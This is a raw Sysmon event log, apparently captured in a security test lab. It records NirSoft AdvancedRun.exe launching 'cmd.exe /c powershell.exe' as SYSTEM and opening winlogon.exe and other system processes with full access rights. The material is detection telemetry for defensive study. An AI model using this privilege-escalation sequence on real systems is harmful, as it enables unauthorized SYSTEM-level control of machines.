18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004016193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004016137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.138{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004015466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004015460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.377{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c powershell.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg 
/runATTACKRANGE\Administrator 10341000x80000000000000004015459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 